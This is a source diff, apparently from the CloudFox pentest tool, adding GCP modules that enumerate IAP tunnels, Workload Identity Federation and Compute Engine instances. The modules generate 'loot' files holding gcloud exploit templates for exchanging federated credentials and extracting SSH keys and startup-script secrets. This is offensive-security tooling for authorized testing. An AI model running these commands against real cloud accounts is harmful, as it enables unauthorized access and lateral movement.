group := range groups { + cidrs := strings.Join(group.CIDRs, ", ") + if cidrs == "" { + cidrs = "-" + } + fqdns := strings.Join(group.FQDNs, ", ") + if fqdns == "" { + fqdns = "-" + } + + if len(group.IAMBindings) > 0 { + for _, binding := range group.IAMBindings { + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.Name, + group.Region, + cidrs, + fqdns, + binding.Role, + binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.Name, + group.Region, + cidrs, + fqdns, + "-", + "-", + }) + } + } + return body +} + +func (m *IAPModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if 
groups, ok := m.ProjectTunnelDestGroups[projectID]; ok && len(groups) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: m.getHeader(), + Body: m.groupsToTableBody(groups), + }) + } + + return tableFiles +} + +func (m *IAPModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectTunnelDestGroups { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = IAPOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} + +func (m *IAPModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allGroups := m.getAllTunnelDestGroups() + + var tables []internal.TableFile + + if len(allGroups) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: m.getHeader(), + Body: m.groupsToTableBody(allGroups), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := IAPOutput{Table: tables, 
Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} diff --git a/gcp/commands/identityfederation.go b/gcp/commands/identityfederation.go new file mode 100644 index 00000000..24652071 --- /dev/null +++ b/gcp/commands/identityfederation.go @@ -0,0 +1,621 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + workloadidentityservice "github.com/BishopFox/cloudfox/gcp/services/workloadIdentityService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIdentityFederationCommand = &cobra.Command{ + Use: globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + Aliases: []string{"federation", "wif", "federated-identity"}, + Short: "Enumerate Workload Identity Federation (external identities)", + Long: `Enumerate Workload Identity Federation pools, providers, and federated bindings. + +Workload Identity Federation allows external identities (AWS, GitHub Actions, +GitLab CI, Azure AD, etc.) to authenticate as GCP service accounts without +using service account keys. 
+ +Features: +- Lists Workload Identity Pools and Providers +- Analyzes AWS, OIDC (GitHub Actions, GitLab CI), and SAML providers +- Identifies risky provider configurations (missing attribute conditions) +- Shows federated identity bindings to GCP service accounts +- Generates exploitation commands for pentesting + +Security Considerations: +- Providers without attribute conditions allow ANY identity from the source +- OIDC providers (GitHub Actions, GitLab) may allow any repo/pipeline to authenticate +- AWS providers allow cross-account access from the configured AWS account +- Federated identities inherit all permissions of the bound GCP service account + +TIP: Run 'workload-identity' to enumerate GKE-specific K8s SA -> GCP SA bindings. +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPIdentityFederationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type IdentityFederationModule struct { + gcpinternal.BaseGCPModule + + ProjectPools map[string][]workloadidentityservice.WorkloadIdentityPool // projectID -> pools + ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers + ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type IdentityFederationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IdentityFederationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IdentityFederationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func 
runGCPIdentityFederationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + if err != nil { + return + } + + module := &IdentityFederationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPools: make(map[string][]workloadidentityservice.WorkloadIdentityPool), + ProjectProviders: make(map[string][]workloadidentityservice.WorkloadIdentityProvider), + ProjectFederatedBindings: make(map[string][]workloadidentityservice.FederatedIdentityBinding), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IdentityFederationModule) Execute(ctx context.Context, logger internal.Logger) { + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for attack path analysis", globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, m.processProject) + + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + + if len(allPools) == 0 { + logger.InfoM("No Workload Identity Federation configurations found", globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d pool(s), %d provider(s), %d federated binding(s)", + len(allPools), len(allProviders), len(allFederatedBindings)), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllPools returns all pools from all projects +func (m *IdentityFederationModule) getAllPools() []workloadidentityservice.WorkloadIdentityPool { + var all []workloadidentityservice.WorkloadIdentityPool + for _, pools := range m.ProjectPools { + 
all = append(all, pools...) + } + return all +} + +// getAllProviders returns all providers from all projects +func (m *IdentityFederationModule) getAllProviders() []workloadidentityservice.WorkloadIdentityProvider { + var all []workloadidentityservice.WorkloadIdentityProvider + for _, providers := range m.ProjectProviders { + all = append(all, providers...) + } + return all +} + +// getAllFederatedBindings returns all federated bindings from all projects +func (m *IdentityFederationModule) getAllFederatedBindings() []workloadidentityservice.FederatedIdentityBinding { + var all []workloadidentityservice.FederatedIdentityBinding + for _, bindings := range m.ProjectFederatedBindings { + all = append(all, bindings...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *IdentityFederationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Identity Federation in project: %s", projectID), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } + + wiSvc := workloadidentityservice.New() + + // Get Workload Identity Pools + allPools, err := wiSvc.ListWorkloadIdentityPools(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not list Workload Identity Pools in project %s", projectID)) + return + } + + // Filter out GKE Workload Identity pools (*.svc.id.goog) - those belong to the workload-identity module + var pools []workloadidentityservice.WorkloadIdentityPool + for _, pool := range allPools { + if !strings.HasSuffix(pool.PoolID, ".svc.id.goog") { + pools = append(pools, pool) + } + } + + var providers []workloadidentityservice.WorkloadIdentityProvider + + // Get providers for each pool + for _, pool := range pools { + poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, 
pool.PoolID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not list providers for pool %s", pool.PoolID)) + continue + } + providers = append(providers, poolProviders...) + } + + // Find federated identity bindings + fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not find federated identity bindings in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectPools[projectID] = pools + m.ProjectProviders[projectID] = providers + m.ProjectFederatedBindings[projectID] = fedBindings + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["identity-federation-commands"] = &internal.LootFile{ + Name: "identity-federation-commands", + Contents: "# Identity Federation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, pool := range pools { + m.addPoolToLoot(projectID, pool) + } + for _, provider := range providers { + m.addProviderToLoot(projectID, provider) + } + for _, fedBinding := range fedBindings { + m.addFederatedBindingToLoot(projectID, fedBinding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d pool(s), %d provider(s), %d federated binding(s) in project %s", + len(pools), len(providers), len(fedBindings), projectID), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IdentityFederationModule) addPoolToLoot(projectID string, pool workloadidentityservice.WorkloadIdentityPool) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + status := "Active" + if 
pool.Disabled { + status = "Disabled" + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# FEDERATION POOL: %s\n"+ + "# =============================================================================\n"+ + "# Display Name: %s\n"+ + "# State: %s (%s)\n"+ + "# Description: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe pool:\n"+ + "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ + "# List providers:\n"+ + "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", + pool.PoolID, + pool.DisplayName, + pool.State, status, + pool.Description, + pool.PoolID, pool.ProjectID, + pool.PoolID, pool.ProjectID, + ) +} + +func (m *IdentityFederationModule) addProviderToLoot(projectID string, provider workloadidentityservice.WorkloadIdentityProvider) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# PROVIDER: %s/%s (%s)\n"+ + "# -----------------------------------------------------------------------------\n", + provider.PoolID, provider.ProviderID, + provider.ProviderType, + ) + + if provider.ProviderType == "AWS" { + lootFile.Contents += fmt.Sprintf( + "# AWS Account: %s\n", provider.AWSAccountID) + } else if provider.ProviderType == "OIDC" { + lootFile.Contents += fmt.Sprintf( + "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) + } + + if provider.AttributeCondition != "" { + lootFile.Contents += fmt.Sprintf( + "# Attribute Condition: %s\n", provider.AttributeCondition) + } else { + lootFile.Contents += "# Attribute Condition: NONE (any identity from this provider can authenticate!)\n" + } + + lootFile.Contents += "\n# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Describe provider:\n"+ + 
"gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", + provider.ProviderID, provider.PoolID, provider.ProjectID, + ) + + // Add exploitation guidance based on provider type + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + switch provider.ProviderType { + case "AWS": + lootFile.Contents += fmt.Sprintf( + "# From AWS account %s, exchange credentials:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --aws --output-file=gcp-creds.json\n\n", + provider.AWSAccountID, + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + case "OIDC": + if strings.Contains(provider.OIDCIssuerURI, "github") { + lootFile.Contents += fmt.Sprintf( + "# From GitHub Actions workflow, add:\n"+ + "# permissions:\n"+ + "# id-token: write\n"+ + "# contents: read\n"+ + "# Then use:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n"+ + "# --output-file=gcp-creds.json\n\n", + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + } + } +} + +func (m *IdentityFederationModule) addFederatedBindingToLoot(projectID string, binding workloadidentityservice.FederatedIdentityBinding) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# FEDERATED BINDING\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Pool: %s\n"+ + "# GCP Service Account: %s\n"+ + "# External Subject: %s\n\n", + binding.PoolID, + binding.GCPServiceAccount, + binding.ExternalSubject, + ) +} + +// ------------------------------ +// Output Generation +// 
------------------------------ +func (m *IdentityFederationModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IdentityFederationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectPools { + tables := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = IdentityFederationOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *IdentityFederationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + + tables := m.buildTables(allPools, allProviders, allFederatedBindings) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + 
output := IdentityFederationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables for a specific project +func (m *IdentityFederationModule) buildTablesForProject(projectID string) []internal.TableFile { + pools := m.ProjectPools[projectID] + providers := m.ProjectProviders[projectID] + federatedBindings := m.ProjectFederatedBindings[projectID] + return m.buildTables(pools, providers, federatedBindings) +} + +// buildTables builds all tables from the given data +func (m *IdentityFederationModule) buildTables( + pools []workloadidentityservice.WorkloadIdentityPool, + providers []workloadidentityservice.WorkloadIdentityProvider, + federatedBindings []workloadidentityservice.FederatedIdentityBinding, +) []internal.TableFile { + var tables []internal.TableFile + + // Pools table + if len(pools) > 0 { + poolsHeader := []string{ + "Project", + "Pool ID", + "Display Name", + "State", + "Disabled", + } + + var poolsBody [][]string + for _, pool := range pools { + disabled := "No" + if pool.Disabled { + disabled = "Yes" + } + poolsBody = append(poolsBody, []string{ + m.GetProjectName(pool.ProjectID), + pool.PoolID, + pool.DisplayName, + pool.State, + disabled, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-pools", + Header: poolsHeader, + Body: poolsBody, + }) + } + + // Providers table + if len(providers) > 0 { + providersHeader := []string{ + "Project", + "Pool", + "Provider", + "Type", + "OIDC Issuer / AWS Account", + "Trust Scope", + 
"Access Condition", + } + + var providersBody [][]string + for _, p := range providers { + issuerOrAccount := "-" + if p.ProviderType == "AWS" { + issuerOrAccount = p.AWSAccountID + } else if p.ProviderType == "OIDC" { + issuerOrAccount = p.OIDCIssuerURI + } + + attrCond := "NONE" + if p.AttributeCondition != "" { + attrCond = p.AttributeCondition + } + + trustScope := analyzeTrustScope(p) + + providersBody = append(providersBody, []string{ + m.GetProjectName(p.ProjectID), + p.PoolID, + p.ProviderID, + p.ProviderType, + issuerOrAccount, + trustScope, + attrCond, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-providers", + Header: providersHeader, + Body: providersBody, + }) + } + + // Federated bindings table + if len(federatedBindings) > 0 { + fedBindingsHeader := []string{ + "Project", + "Pool", + "GCP Service Account", + "External Identity", + "SA Attack Paths", + } + + var fedBindingsBody [][]string + for _, fb := range federatedBindings { + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, fb.GCPServiceAccount) + + fedBindingsBody = append(fedBindingsBody, []string{ + m.GetProjectName(fb.ProjectID), + fb.PoolID, + fb.GCPServiceAccount, + fb.ExternalSubject, + attackPaths, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-bindings", + Header: fedBindingsHeader, + Body: fedBindingsBody, + }) + } + + return tables +} + +// analyzeTrustScope examines a provider's configuration and returns a human-readable +// summary of how broad the trust is. Flags overly permissive configurations. 
+func analyzeTrustScope(p workloadidentityservice.WorkloadIdentityProvider) string { + // No attribute condition = any identity from this provider + if p.AttributeCondition == "" { + switch p.ProviderType { + case "AWS": + return "BROAD: Any role in AWS account " + p.AWSAccountID + case "OIDC": + return "BROAD: Any identity from issuer" + case "SAML": + return "BROAD: Any SAML assertion" + default: + return "BROAD: No condition set" + } + } + + cond := p.AttributeCondition + var issues []string + + // Check for wildcard patterns in the condition + if strings.Contains(cond, `"*"`) || strings.Contains(cond, `'*'`) { + issues = append(issues, "wildcard (*) in condition") + } + + // GitHub Actions specific analysis + if p.ProviderType == "OIDC" && strings.Contains(p.OIDCIssuerURI, "github") { + // Check if repo is scoped + if !strings.Contains(cond, "repository") && !strings.Contains(cond, "repo") { + issues = append(issues, "no repo restriction") + } + + // Check if branch/ref is scoped + if strings.Contains(cond, "repository") || strings.Contains(cond, "repo") { + if !strings.Contains(cond, "ref") && !strings.Contains(cond, "branch") { + issues = append(issues, "no branch restriction") + } + } + + // Check for org-wide trust (repo starts with org/) + if strings.Contains(cond, ".startsWith(") { + issues = append(issues, "prefix match (org-wide?)") + } + } + + // GitLab CI specific analysis + if p.ProviderType == "OIDC" && strings.Contains(p.OIDCIssuerURI, "gitlab") { + if !strings.Contains(cond, "project_path") && !strings.Contains(cond, "namespace_path") { + issues = append(issues, "no project restriction") + } + if !strings.Contains(cond, "ref") && !strings.Contains(cond, "branch") { + issues = append(issues, "no branch restriction") + } + } + + // AWS specific analysis + if p.ProviderType == "AWS" { + if !strings.Contains(cond, "arn") && !strings.Contains(cond, "account") { + issues = append(issues, "no role/account restriction") + } + } + + if len(issues) > 0 { + 
return "BROAD: " + strings.Join(issues, ", ") + } + + return "Scoped" +} diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 79334951..7cd9d8de 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -1,126 +1,994 @@ package commands import ( + "context" + "encoding/json" "fmt" + "sort" + "strings" + "sync" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPInstancesCommand = &cobra.Command{ - Use: globals.GCP_INSTANCES_MODULE_NAME, // This should be defined in the globals package - Aliases: []string{}, - Short: "Display GCP Compute Engine instances information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Compute Engine instances information: -cloudfox gcp instances`, + Use: globals.GCP_INSTANCES_MODULE_NAME, + Aliases: []string{"vms", "compute", "ssh", "oslogin"}, + Short: "Enumerate GCP Compute Engine instances with security configuration", + Long: `Enumerate GCP Compute Engine instances across projects with security-relevant details. 
+ +Features: +- Lists all instances with network and security configuration +- Shows attached service accounts and their scopes +- Identifies instances with default service accounts or broad scopes +- Shows Shielded VM, Secure Boot, and Confidential VM status +- Shows OS Login configuration (enabled, 2FA, block project keys) +- Shows serial port and disk encryption configuration +- Extracts SSH keys from project and instance metadata +- Extracts startup scripts (may contain secrets) +- Generates gcloud commands for instance access and exploitation + +Security Columns: +- ExternalIP: Instances with external IPs are internet-accessible +- DefaultSA: Uses default compute service account (security risk) +- BroadScopes: Has cloud-platform or other broad OAuth scopes +- OSLogin: OS Login enabled (recommended for access control) +- OSLogin2FA: OS Login with 2FA required +- BlockProjKeys: Instance blocks project-wide SSH keys +- SerialPort: Serial port access enabled (security risk if exposed) +- CanIPForward: Can forward packets (potential for lateral movement) +- ShieldedVM/SecureBoot/vTPM/Integrity: Hardware security features +- Confidential: Confidential computing enabled +- Encryption: Boot disk encryption type (Google-managed, CMEK, CSEK)`, Run: runGCPInstancesCommand, } -// GCPInstancesResults implements internal.OutputInterface for Compute Engine instances -type GCPInstancesResults struct { - Data []ComputeEngineService.ComputeEngineInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type InstancesModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectInstances map[string][]ComputeEngineService.ComputeEngineInfo // projectID -> instances + ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache 
*gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type InstancesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } -func (g GCPInstancesResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +func (o InstancesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InstancesOutput) LootFiles() []internal.LootFile { return o.Loot } - header := []string{ - "Name", - "ID", - "State", - "ExternalIP", - "InternalIP", - "ServiceAccount", // Adding ServiceAccount to the header - "Zone", - "ProjectID", +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPInstancesCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_INSTANCES_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string - for _, instance := range g.Data { - // Initialize an empty string to aggregate service account emails - var serviceAccountEmails string - for _, serviceAccount := range instance.ServiceAccounts { - // Assuming each instance can have multiple service accounts, concatenate their emails - if serviceAccountEmails != "" { - serviceAccountEmails += "; " // Use semicolon as a delimiter for multiple emails + // Create module instance + module := &InstancesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]ComputeEngineService.ComputeEngineInfo), + ProjectMetadata: make(map[string]*ComputeEngineService.ProjectMetadataInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func 
(m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_INSTANCES_MODULE_NAME) + } + + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) + + // Get all instances for stats + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No instances found", globals.GCP_INSTANCES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(allInstances)), globals.GCP_INSTANCES_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllInstances returns all instances from all projects (for statistics) +func (m *InstancesModule) getAllInstances() []ComputeEngineService.ComputeEngineInfo { + var all []ComputeEngineService.ComputeEngineInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) 
+ } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *InstancesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating instances in project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + + // Create service and fetch instances with project metadata + ces := ComputeEngineService.New() + instances, projectMeta, err := ces.InstancesWithMetadata(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_INSTANCES_MODULE_NAME, + fmt.Sprintf("Could not enumerate instances in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectInstances[projectID] = instances + m.ProjectMetadata[projectID] = projectMeta + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["instances-commands"] = &internal.LootFile{ + Name: "instances-commands", + Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["instances-metadata"] = &internal.LootFile{ + Name: "instances-metadata", + Contents: "", + } + m.LootMap[projectID]["instances-ssh-keys"] = &internal.LootFile{ + Name: "instances-ssh-keys", + Contents: "# GCP Compute Engine SSH Keys\n# Generated by CloudFox\n# Format: user:key-type KEY comment\n\n", + } + } + + // Generate loot for each instance + for _, instance := range instances { + m.addInstanceToLoot(projectID, instance) + m.addInstanceMetadataToLoot(projectID, instance) + m.addInstanceSSHKeysToLoot(projectID, instance) + } + + // Add project metadata to loot + m.addProjectMetadataToLoot(projectID, projectMeta) + 
m.addProjectMetadataFullToLoot(projectID, projectMeta) + m.addProjectSSHKeysToLoot(projectID, projectMeta) + + // Log sensitive metadata findings + if projectMeta != nil && len(projectMeta.SensitiveMetadata) > 0 { + logger.InfoM(fmt.Sprintf("Found %d sensitive metadata item(s) in project %s metadata", len(projectMeta.SensitiveMetadata), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + for _, inst := range instances { + if len(inst.SensitiveMetadata) > 0 { + logger.InfoM(fmt.Sprintf("Found %d sensitive metadata item(s) in instance %s", len(inst.SensitiveMetadata), inst.Name), globals.GCP_INSTANCES_MODULE_NAME) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ + +// addProjectMetadataToLoot adds project metadata commands to the commands loot file +func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return + } + + lootFile := m.LootMap[projectID]["instances-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT-LEVEL COMMANDS (Project: %s)\n"+ + "# =============================================================================\n\n", + meta.ProjectID, + ) + + // --- PROJECT ENUMERATION --- + lootFile.Contents += "# === PROJECT ENUMERATION ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute project-info describe --project=%s\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n"+ + "gcloud compute project-info describe --project=%s --format='value(commonInstanceMetadata.items)'\n", + meta.ProjectID, meta.ProjectID, meta.ProjectID, + ) + 
